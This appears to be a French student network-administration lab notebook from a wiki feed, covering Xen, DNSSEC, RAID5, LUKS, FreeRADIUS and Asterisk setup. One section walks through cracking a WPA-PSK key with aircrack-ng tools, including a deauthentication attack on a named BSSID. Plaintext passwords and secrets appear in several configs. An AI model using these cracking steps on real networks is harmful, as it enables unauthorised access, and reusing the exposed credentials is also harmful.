 [Jan  6 16:12:14] NOTICE[3824]: chan_sip.c:27870 handle_request_subscribe: Received SIP subscribe for peer without mailbox: 665&lt;br /&gt;
   == Using SIP RTP CoS mark 5&lt;br /&gt;
     -- Executing [666@work:1] Dial(&amp;quot;SIP/665-00000000&amp;quot;, &amp;quot;SIP/666,20&amp;quot;) in new stack&lt;br /&gt;
   == Using SIP RTP CoS mark 5&lt;br /&gt;
     -- Called SIP/666&lt;br /&gt;
     -- SIP/666-00000001 is ringing&lt;br /&gt;
     -- SIP/666-00000001 answered SIP/665-00000000&lt;br /&gt;
     -- Remotely bridging SIP/665-00000000 and SIP/666-00000001&lt;br /&gt;
   == Spawn extension (work, 666, 1) exited non-zero on 'SIP/665-00000000'&lt;br /&gt;
 Frotteman*CLI&amp;gt;&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=37061</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=37061"/>
				<updated>2017-01-08T17:42:45Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance6 : Sécurisation &amp;amp; Certification */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1 : Configuration du Bonding=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2 : Installation de la machine virtuelle=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
=Séance3 : Volumes logiques=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5 : DNS=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6 : Sécurisation &amp;amp; Certification=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout faispas.key -out faispas.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;br /&gt;
&lt;br /&gt;
On ajoute les fichiers à notre config :&lt;br /&gt;
&lt;br /&gt;
 cp faispas.crt GandiStandardSSLCA2.pem /etc/ssl/certs/ &lt;br /&gt;
 cp faispas.key /etc/ssl/private/&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:~# c_rehash /etc/ssl/certs &lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; 8544bf03.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; e279a80b.0&lt;br /&gt;
 faispas.crt =&amp;gt; 82591bcd.0&lt;br /&gt;
 faispas.crt =&amp;gt; a73fda57.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNSSEC&lt;br /&gt;
Génération des clefs :&lt;br /&gt;
 &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
On inclut dans les clés dans le fichier de zone.db :&lt;br /&gt;
&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-ksk.key&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone : &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/faispastomberlasavo.net.dnssec# dnssec-signzone -o  faispastomberlasavo.net -k  faispastomberlasavo.net-ksk ../db. faispastomberlasavo.net faispastomberlasavo.net-zsk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.faispastomberlasavo.net.signed&lt;br /&gt;
&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:/etc/bind# dig DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 &lt;br /&gt;
 ; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 ;; global options: +cmd&lt;br /&gt;
 ;; Got answer:&lt;br /&gt;
 ;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 10598&lt;br /&gt;
 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
 &lt;br /&gt;
 ;; OPT PSEUDOSECTION:&lt;br /&gt;
 ; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
 ;; QUESTION SECTION:&lt;br /&gt;
 ;faispastomberlasavo.net.	IN	DNSKEY   &lt;br /&gt;
 &lt;br /&gt;
 ;; ANSWER SECTION:&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	257 3 5 AwEAAa3Js66YHVQrw4q+4IKA71lRK9AXWznEZyoxVCxr0SSYx+TFUXxh VTbjq1H8aYjwUa1UyuFsHUC72wJcTNCo0DNOX6Qcek/Y9O30x8xnXRdB OsNFLhnc5v4b5mLTGLswS3GpBCgP8+xSj4LmZPrLZneVom5Q2xCl40KT b5WdpMXXmPjaPOk24gdr5QYzZxrSIqmbEjp2DPaCZiAqPJ8hvvqPFQ+Q Bq53a5/ra3PfN1uo0B2WzeGN0nsb3QDLAREmuovHxSJjm23Yv7rcU8eb txBuOPkbgyES/ybN0uWvW3hiHipXeMCa+yRywnle2Ea56k6w4bcPNta3 8qeF3KwqszE=&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	256 3 5 AwEAAe+I1C2IYzY323K1HXia8curPC+ZduRAiXpsYMdBRyTQOpxTf0zf ulFh42UOPhRCrYm3CZkOesUjhbS0Z3WVzy6u/RHJDRKiqNUbpnBN8jQf mmhIx8FJU3Kcu5st+T6cRWOEoCQIS6tOM31u5I4NKrhXZamDiV361YTQ nJrJNT//&lt;br /&gt;
 &lt;br /&gt;
 ;; Query time: 0 msec&lt;br /&gt;
 ;; SERVER: 127.0.0.1#53(127.0.0.1)&lt;br /&gt;
 ;; WHEN: Mon Nov 28 17:05:19 CET 2016&lt;br /&gt;
 ;; MSG SIZE  rcvd: 476&lt;br /&gt;
&lt;br /&gt;
==Crack clé WPA/PSK==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il faut passer l'interface réseau en mode &amp;quot;Monitor&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan1&lt;br /&gt;
&lt;br /&gt;
Nous pouvons détecter les hotspots grâce à l'utilitaire airodump-ng&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
Nous voulions trouvé la clé de &amp;quot;cracotte01&amp;quot;, nous avons donc filtré pour le bssid &amp;quot;04:DA:D2:9C:50:50&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w out --bssid 04:DA:D2:9C:50:50 mon0&lt;br /&gt;
 aireplay-ng -0 0 -a 04:DA:D2:9C:50:50&lt;br /&gt;
&lt;br /&gt;
Nous avons créer notre dictionnaire de la façon suivante&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o dico.txt&lt;br /&gt;
&lt;br /&gt;
Que nous avons tester sur une Zabeth par soucis de rapidité&lt;br /&gt;
 &lt;br /&gt;
 aircrack-ng -w dico.txt out-01.cap&lt;br /&gt;
&lt;br /&gt;
Qui nous a donné le résultat suivant&lt;br /&gt;
&lt;br /&gt;
 [[Fichier:Aircrack_screen.png|500px|thumb|center]]&lt;br /&gt;
&lt;br /&gt;
==Travail à Réalisé==&lt;br /&gt;
===6.1 Raid===&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il a fallu créer les disques virtuels avec ''lvcreate'' :&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid1 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid2 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid3 -v&lt;br /&gt;
&lt;br /&gt;
Puis il faut rajouter à la config ''/etc/xen/Frotteman.cfg'' :&lt;br /&gt;
&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid1,xvdd1, w',&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid2,xvdd2, w',&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid3,xvdd3, w',&lt;br /&gt;
&lt;br /&gt;
Une fois ceci fait on redémarre la VM et on installe ''mdadm'' :&lt;br /&gt;
&lt;br /&gt;
 apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
On met à jour les modules du kernel (enfin je crois) :&lt;br /&gt;
&lt;br /&gt;
 apt-get install linux-image.3.16.0-4-amd64&lt;br /&gt;
&lt;br /&gt;
Il ne nous reste plus qu'à créer notre disque RAID5 ''md0'' :&lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
&lt;br /&gt;
Nous installons un système de fichier ''ext4'' dessus:&lt;br /&gt;
&lt;br /&gt;
 mkfs -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant le monter :&lt;br /&gt;
&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour tester nous avons copié en partie le dossier /lib dans /mnt.&lt;br /&gt;
Nous commentons une ligne du fichier /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
 #'phy:/dev/virtual/Frotteman-raid2,xvdd2, x',&lt;br /&gt;
&lt;br /&gt;
Puis nous observons les différents résultats via ''fdisk'' :&lt;br /&gt;
&lt;br /&gt;
 fdisk -l&lt;br /&gt;
&lt;br /&gt;
 Disk /dev/xvdd1: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
 Disk /dev/xvdd3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
 Disk /dev/md0: 2 GiB, 2145386496 bytes, 4190208 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 524288 bytes / 1048576 bytes&lt;br /&gt;
&lt;br /&gt;
On observe l'absence du disque xvdd2 mais nous avons en revanche toutes nos données sur /mnt&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:~# ls /mnt/lib&lt;br /&gt;
 ifupdown			      libipq.so.0.0.0	    startpar&lt;br /&gt;
 init				      libiptc.so.0	    systemd&lt;br /&gt;
 klibc-IpHGKKbZiB_yZ7GPagmQz2GwVAQ.so  libiptc.so.0.0.0	    terminfo&lt;br /&gt;
 libip4tc.so.0			      libxtables.so.10	    udev&lt;br /&gt;
 libip4tc.so.0.1.0		      libxtables.so.10.0.0  x86_64-linux-gnu&lt;br /&gt;
 libip6tc.so.0			      lsb		    xtables&lt;br /&gt;
 libip6tc.so.0.1.0		      modprobe.d&lt;br /&gt;
 libipq.so.0			      modules&lt;br /&gt;
&lt;br /&gt;
Nous avons même été prévenu via mail par mdadm, c'est bo l'info !!&lt;br /&gt;
&lt;br /&gt;
 From root@faispastomberlasavo.net  Wed Dec  7 17:06:00 2016&lt;br /&gt;
 X-Original-To: root&lt;br /&gt;
 From: mdadm monitoring &amp;lt;root@faispastomberlasavo.net&amp;gt;&lt;br /&gt;
 To: root@faispastomberlasavo.net&lt;br /&gt;
 Subject: DegradedArray event on /dev/md0:Frotteman&lt;br /&gt;
 Date: Wed,  7 Dec 2016 17:05:56 +0100 (CET)&lt;br /&gt;
 &lt;br /&gt;
 This is an automatically generated mail message from mdadm&lt;br /&gt;
 running on Frotteman&lt;br /&gt;
 &lt;br /&gt;
 A DegradedArray event had been detected on md device /dev/md0.&lt;br /&gt;
 &lt;br /&gt;
 Faithfully yours, etc.&lt;br /&gt;
 &lt;br /&gt;
 P.S. The /proc/mdstat file currently contains the following:&lt;br /&gt;
 &lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active (auto-read-only) raid5 xvdd1[0] xvdd3[2]&lt;br /&gt;
       2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
       &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===6.2 Cryptage carte SD===&lt;br /&gt;
Pour crypter les données présente sur un support de stockage nous utiliserons Gparted et CryptSetup&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c eas -h sha256 /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
On rentre notre phrase secrète.&lt;br /&gt;
&lt;br /&gt;
Optionel : On peut afficher l'état du conteneur grâce à la commande :&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksDump /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
On peut désormais ouvrir notre volume appelé &amp;quot;frotteman&amp;quot;, il nous faudra ensuite renseigner la clé secrète :&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksOpen /dev/mmcblk1 frotteman&lt;br /&gt;
&lt;br /&gt;
On peut désormais formater le volume en ext3&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext3 /dev/mapper/frotteman&lt;br /&gt;
&lt;br /&gt;
Et finalement monter/demonter le volume :&lt;br /&gt;
&lt;br /&gt;
 mount /dev/mapper/frotteman /mnt/&lt;br /&gt;
 umount /mnt &lt;br /&gt;
&lt;br /&gt;
Et également fermé le volume chiffré :&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksClose frotteman&lt;br /&gt;
&lt;br /&gt;
===6.6 Securasition Wifi par WPA2-EAP===&lt;br /&gt;
 &lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Puis nous avons eu à configurer nos points d'accès wifi au sein du fichier clients.conf, voici à quoi ressemble la configuration d'un des points :&lt;br /&gt;
&lt;br /&gt;
 client E306{&lt;br /&gt;
         ipaddr = 10.60.1.2&lt;br /&gt;
         secret = password&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne restait plus qu'a créer un utilisateur pour ce serveur d'authentification, pour cela nous avons ajouté la ligne suivante dans le fichier users.&lt;br /&gt;
&lt;br /&gt;
 frotteman Cleartext-Password := &amp;quot;youpi&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Une fois cette configuration réalisée nous avons lancé notre serveur FreeRADIUS.&lt;br /&gt;
Configuration des bornes Wi-Fi&lt;br /&gt;
&lt;br /&gt;
Par la suite nous avons réalisé la configuration des bornes Wi-Fi afin d'avoir notre accès sécurisé avec notre serveur FreeRADIUS. La configuation est réalisée en tapant les commandes suivantes après s'être connecté à la borne via telnet :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 &lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_frotteman group radius_frotteman&lt;br /&gt;
 radius-server host 193.48.57.161 auth-port 1812 acct-port 1813 key password&lt;br /&gt;
 aaa group server radius radius_frotteman&lt;br /&gt;
 server 193.48.57.161 auth-port 1812 acct-port 1813&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 dot11 ssid SSID_FROTTEMAN&lt;br /&gt;
 vlan 2&lt;br /&gt;
 authentication open eap eap_frotteman&lt;br /&gt;
 authentication network-eap eap_frotteman&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 &lt;br /&gt;
 exit &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
 encryption vlan 2 mode ciphers aes-ccm tkip&lt;br /&gt;
 ssid SSID_FROTTEMAN &lt;br /&gt;
 &lt;br /&gt;
 exit &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0.2&lt;br /&gt;
 encapsulation dot1Q 2&lt;br /&gt;
 no ip route-cache&lt;br /&gt;
 bridge-group 2&lt;br /&gt;
 bridge-group 2 subscriber-loop-control&lt;br /&gt;
 bridge-group 2 spanning-disabled&lt;br /&gt;
 bridge-group 2 block-unknown-source&lt;br /&gt;
 no bridge-group 2 source-learning&lt;br /&gt;
 no bridge-group 2 unicast-flooding  &lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 interface GigabitEthernet0.2&lt;br /&gt;
 encapsulation dot1Q 2&lt;br /&gt;
 bridge-group 2&lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
  &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===6.8.1 DHCP===&lt;br /&gt;
On installe un server DHCP sur l'eeePC :&lt;br /&gt;
&lt;br /&gt;
 apt-get install isc-dhcp-server&lt;br /&gt;
&lt;br /&gt;
On configure le fichier /etc/dhcp/dhcpd.conf :&lt;br /&gt;
&lt;br /&gt;
 option domain-name &amp;quot;faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
 option domain-name-servers 193.48.57.161;&lt;br /&gt;
 &lt;br /&gt;
 subnet 10.60.2.0 netmask 255.255.255.0 {&lt;br /&gt;
       range 10.60.2.50 10.60.2.100;&lt;br /&gt;
       option routers 10.60.6.1;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Il ne nous reste plus qu'a indiqué notre interface réseau dans le fichier /etc/dhcp/isc-dhcp-server&lt;br /&gt;
 &lt;br /&gt;
===6.8.2 PCBx===&lt;br /&gt;
&lt;br /&gt;
On installe asterisk &lt;br /&gt;
 apt-get install asterisk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/asterisk/sip.conf afin de créer 2 utilisateurs 666 &amp;amp; 665:&lt;br /&gt;
&lt;br /&gt;
 [general]&lt;br /&gt;
 hasvoicemail=yes&lt;br /&gt;
 hassip=yes&lt;br /&gt;
 hasiax=yes&lt;br /&gt;
 callwaiting=yes&lt;br /&gt;
 threewaycalling=yes&lt;br /&gt;
 callwaitingcallerid=yes&lt;br /&gt;
 transfer=yes&lt;br /&gt;
 canpark=yes&lt;br /&gt;
 cancallforward=yes&lt;br /&gt;
 callreturn=yes&lt;br /&gt;
 callgroup=1&lt;br /&gt;
 pickupgroup=1&lt;br /&gt;
 nat=yes&lt;br /&gt;
 &lt;br /&gt;
 [666]&lt;br /&gt;
 type=friend&lt;br /&gt;
 host=dynamic&lt;br /&gt;
 dtmfmode=rfc2833&lt;br /&gt;
 disallow=all&lt;br /&gt;
 allow=ulaw&lt;br /&gt;
 fullname=Cduval&lt;br /&gt;
 username=cduval&lt;br /&gt;
 secret=glopglop&lt;br /&gt;
 context=work &lt;br /&gt;
 &lt;br /&gt;
 [665]&lt;br /&gt;
 type=friend&lt;br /&gt;
 host=dynamic&lt;br /&gt;
 dtmfmode=rfc2833&lt;br /&gt;
 disallow=all&lt;br /&gt;
 allow=ulaw&lt;br /&gt;
 fullname=Pfitouss&lt;br /&gt;
 username=pfitouss&lt;br /&gt;
 secret=glopglop&lt;br /&gt;
 context=work &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc constater que le communication est réussi&lt;br /&gt;
 Frotteman*CLI&amp;gt; sip show peers&lt;br /&gt;
 Name/username             Host                                    Dyn Forcerport Comedia    ACL Port     Status      Description                      &lt;br /&gt;
 665/pfitouss              (Unspecified)                            D  Auto (No)  No             0        Unmonitored                                  &lt;br /&gt;
 666/cduval                (Unspecified)                            D  Auto (No)  No             0        Unmonitored                                  &lt;br /&gt;
 2 sip peers [Monitored: 0 online, 0 offline Unmonitored: 0 online, 2 offline]&lt;br /&gt;
     -- Registered SIP '665' at 10.60.2.100:38862&lt;br /&gt;
 [Jan  6 16:10:49] NOTICE[3824]: chan_sip.c:27870 handle_request_subscribe: Received SIP subscribe for peer without mailbox: 665&lt;br /&gt;
     -- Registered SIP '666' at 10.60.2.101:35192&lt;br /&gt;
 [Jan  6 16:12:06] NOTICE[3824]: chan_sip.c:27870 handle_request_subscribe: Received SIP subscribe for peer without mailbox: 666&lt;br /&gt;
